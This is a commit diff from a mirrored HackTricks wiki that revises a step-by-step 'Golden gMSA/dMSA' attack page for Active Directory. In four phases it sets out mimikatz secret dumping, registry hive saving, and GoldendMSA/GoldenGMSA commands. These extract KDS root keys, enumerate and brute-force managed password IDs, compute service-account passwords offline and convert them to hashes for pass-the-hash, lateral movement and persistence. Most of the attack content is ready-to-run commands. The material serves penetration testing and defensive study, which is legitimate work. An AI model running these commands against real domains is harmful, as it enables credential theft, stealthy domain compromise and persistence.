maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update golden-dmsa-gmsa.md

Browse Source
This commit is contained in:
Adi 2025-07-20 20:52:05 +03:00 committed by GitHub
parent 81c7593767
commit 12d7a8b4bf
1 changed files with 21 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

33
src/windows-hardening/active-directory-methodology/golden-dmsa-gmsa.md
View File

@ -23,7 +23,6 @@ No Kerberos traffic or domain interaction is required during normal password usa
If an attacker can obtain all three inputs **offline** they can compute **valid current and future passwords** for **any gMSA/dMSA in the forest** without touching the DC again, bypassing: If an attacker can obtain all three inputs **offline** they can compute **valid current and future passwords** for **any gMSA/dMSA in the forest** without touching the DC again, bypassing:
* Kerberos pre-authentication / ticket request logs
* LDAP read auditing * LDAP read auditing
* Password change intervals (they can pre-compute) * Password change intervals (they can pre-compute)
@ -31,11 +30,12 @@ This is analogous to a *Golden Ticket* for service accounts.
### Prerequisites ### Prerequisites
1. **Forest-level compromise** of **one DC** (or Enterprise Admin). `SYSTEM` access is enough. 1. **Forest-level compromise** of **one DC** (or Enterprise Admin), or `SYSTEM` access to one of the DCs in the forest.
2. Ability to enumerate service accounts (LDAP read / RID brute-force). 2. Ability to enumerate service accounts (LDAP read / RID brute-force).
3. .NET ≥ 4.7.2 x64 workstation to run [`GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) or equivalent code. 3. .NET ≥ 4.7.2 x64 workstation to run [`GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) or equivalent code.
### Phase 1 Extract the KDS Root Key ### Golden gMSA / dMSA
##### Phase 1 Extract the KDS Root Key
Dump from any DC (Volume Shadow Copy / raw SAM+SECURITY hives or remote secrets): Dump from any DC (Volume Shadow Copy / raw SAM+SECURITY hives or remote secrets):
@ -46,10 +46,17 @@ reg save HKLM\SYSTEM system.hive
# With mimikatz on the DC / offline # With mimikatz on the DC / offline
mimikatz # lsadump::secrets mimikatz # lsadump::secrets
mimikatz # lsadump::trust /patch # shows KDS root keys too mimikatz # lsadump::trust /patch # shows KDS root keys too
# With GoldendMSA
GoldendMSA.exe kds --domain <domain name> # query KDS root keys from a DC in the forest
GoldendMSA.exe kds
# With GoldenGMSA
GoldenGMSA.exe kdsinfo
``` ```
The base64 string labelled `RootKey` (GUID name) is required in later steps. The base64 string labelled `RootKey` (GUID name) is required in later steps.
### Phase 2 Enumerate gMSA/dMSA objects ##### Phase 2 Enumerate gMSA / dMSA objects
Retrieve at least `sAMAccountName`, `objectSid` and `msDS-ManagedPasswordId`: Retrieve at least `sAMAccountName`, `objectSid` and `msDS-ManagedPasswordId`:
@ -57,6 +64,8 @@ Retrieve at least `sAMAccountName`, `objectSid` and `msDS-ManagedPasswordId`:
# Authenticated or anonymous depending on ACLs # Authenticated or anonymous depending on ACLs
Get-ADServiceAccount -Filter * -Properties msDS-ManagedPasswordId | \ Get-ADServiceAccount -Filter * -Properties msDS-ManagedPasswordId | \
Select sAMAccountName,objectSid,msDS-ManagedPasswordId Select sAMAccountName,objectSid,msDS-ManagedPasswordId
GoldenGMSA.exe gmsainfo
``` ```
[`GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) implements helper modes: [`GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) implements helper modes:
@ -69,10 +78,10 @@ GoldendMSA.exe info -d example.local -m ldap
GoldendMSA.exe info -d example.local -m brute -r 5000 -u jdoe -p P@ssw0rd GoldendMSA.exe info -d example.local -m brute -r 5000 -u jdoe -p P@ssw0rd
``` ```
### Phase 3 Guess / Discover the ManagedPasswordID (when missing) ##### Phase 3 Guess / Discover the ManagedPasswordID (when missing)
Some deployments *strip* `msDS-ManagedPasswordId` from ACL-protected reads. Some deployments *strip* `msDS-ManagedPasswordId` from ACL-protected reads.
Because the GUID is 128-bit, naïve bruteforce is infeasible, but: Because the GUID is 128-bit, naive bruteforce is infeasible, but:
1. The first **32 bits = Unix epoch time** of the account creation (minutes resolution). 1. The first **32 bits = Unix epoch time** of the account creation (minutes resolution).
2. Followed by 96 random bits. 2. Followed by 96 random bits.
@ -84,16 +93,14 @@ GoldendMSA.exe wordlist -s <SID> -d example.local -f example.local -k <KDSKeyGUI
``` ```
The tool computes candidate passwords and compares their base64 blob against the real `msDS-ManagedPassword` attribute the match reveals the correct GUID. The tool computes candidate passwords and compares their base64 blob against the real `msDS-ManagedPassword` attribute the match reveals the correct GUID.
### Phase 4 Offline Password Computation & Conversion ##### Phase 4 Offline Password Computation & Conversion
Once the ManagedPasswordID is known, the valid password is one command away: Once the ManagedPasswordID is known, the valid password is one command away:
```powershell ```powershell
# derive base64 password # derive base64 password
GoldendMSA.exe compute -s <SID> -k <KDSRootKey> -d example.local -m <ManagedPasswordID> GoldendMSA.exe compute -s <SID> -k <KDSRootKey> -d example.local -m <ManagedPasswordID> -i <KDSRootKey ID>
GoldenGMSA.exe compute --sid <SID> --kdskey <KDSRootKey> --pwdid <ManagedPasswordID>
# convert to NTLM / AES keys for pass-the-hash / pass-the-ticket
GoldendMSA.exe convert -d example.local -u svc_web$ -p <Base64Pwd>
``` ```
The resulting hashes can be injected with **mimikatz** (`sekurlsa::pth`) or **Rubeus** for Kerberos abuse, enabling stealth **lateral movement** and **persistence**. The resulting hashes can be injected with **mimikatz** (`sekurlsa::pth`) or **Rubeus** for Kerberos abuse, enabling stealth **lateral movement** and **persistence**.
@ -108,13 +115,15 @@ The resulting hashes can be injected with **mimikatz** (`sekurlsa::pth`) or **Ru
## Tooling ## Tooling
* [`Semperis/GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) reference implementation used in this page. * [`Semperis/GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) reference implementation used in this page.
* [`Semperis/GoldenGMSA`](https://github.com/Semperis/GoldenGMSA/) reference implementation used in this page.
* [`mimikatz`](https://github.com/gentilkiwi/mimikatz) `lsadump::secrets`, `sekurlsa::pth`, `kerberos::ptt`. * [`mimikatz`](https://github.com/gentilkiwi/mimikatz) `lsadump::secrets`, `sekurlsa::pth`, `kerberos::ptt`.
* [`Rubeus`](https://github.com/GhostPack/Rubeus) pass-the-ticket using derived AES keys. * [`Rubeus`](https://github.com/GhostPack/Rubeus) pass-the-ticket using derived AES keys.
## References ## References
- [Golden dMSA authentication bypass for delegated Managed Service Accounts](https://www.semperis.com/blog/golden-dmsa-what-is-dmsa-authentication-bypass/) - [Golden dMSA authentication bypass for delegated Managed Service Accounts](https://www.semperis.com/blog/golden-dmsa-what-is-dmsa-authentication-bypass/)
- [gMSA Active Directory Attacks Accounts](https://www.semperis.com/blog/golden-gmsa-attack/)
- [Semperis/GoldenDMSA GitHub repository](https://github.com/Semperis/GoldenDMSA) - [Semperis/GoldenDMSA GitHub repository](https://github.com/Semperis/GoldenDMSA)
- [Improsec Golden gMSA trust attack](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent) - [Improsec Golden gMSA trust attack](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent)
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}